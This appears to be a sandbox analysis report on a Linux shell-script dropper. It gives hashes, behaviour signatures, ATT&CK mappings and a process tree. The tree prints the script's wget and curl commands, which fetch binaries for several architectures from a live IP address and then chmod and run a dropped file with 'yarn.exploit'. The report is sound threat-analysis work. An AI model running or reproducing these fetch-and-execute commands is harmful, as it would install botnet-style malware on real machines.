0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b

Analysis

max time kernel
10s
max time network
11s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
09-10-2024 01:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
Size

4KB
MD5

b294eb82d74dfef6c5bde2a967f84575
SHA1

382e337d7c0883288a5079d5eadf967e6c0c8934
SHA256

0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b
SHA512

8e55d076ec7cc6227605b5bdd45f024a2447858359dd9a3e1d3822ba131c6d896ed82f0331cb2be586a974a6ce260656826768b209cfd87d3235ee9f2831d826
SSDEEP

48:vXzWzMV4klXz5z1V4RXzrAzrWV4cXzizoV4aXzEezEEV4EeXz+zkV4+Xz5z1V4Rh:vH73WpPrDoFEpe5NjaTEVf3lT0zAbq

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
684	chmod
701	chmod
730	chmod
746	chmod
771	chmod

Executes dropped EXE 5 IoCs

ioc	pid	Process
/tmp/76d32be0	685	76d32be0
/tmp/76d32be0	702	76d32be0
/tmp/76d32be0	732	76d32be0
/tmp/76d32be0	747	76d32be0
/tmp/76d32be0	772	76d32be0

Checks CPU configuration 1 TTPs 5 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
686	wget
688	curl
700	cat

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/76d32be0	0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl

/tmp/0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
/tmp/0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
1⤵
- Writes file to tmp directory
PID:652
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:654
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:674
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:683
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 db0fa4b8db0333367e9bda3ab68b8042.x86 systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-kdyBbJ
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:685
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:686
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:688
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:700
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-kdyBbJ
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:702
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:703
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:715
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:728
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-kdyBbJ
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:732
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:733
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:744
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-kdyBbJ
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:747
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:759
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  PID:770
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-kdyBbJ
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:772
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  PID:774

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
153B

MD5
932da5a430ff6db1bc48425b567d56fa

SHA1
e7e88023dbbc6346d354ffe9fb7db957888c2299

SHA256
10174434dbe479c08b32ce3b42b70e7c6336647d29e4393483158d590d35c325

SHA512
f30ad93d17d8ceb3ec2727a08a6ce7fc59da51a66ba7aeb2ab93efc84af4e16ea442769f9a5be140287e24d3e431218b0fec1e52e78ea70e5f8607b6569108e4

Download Submit
memory/742-1-0xb6729000-0xb673a044-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads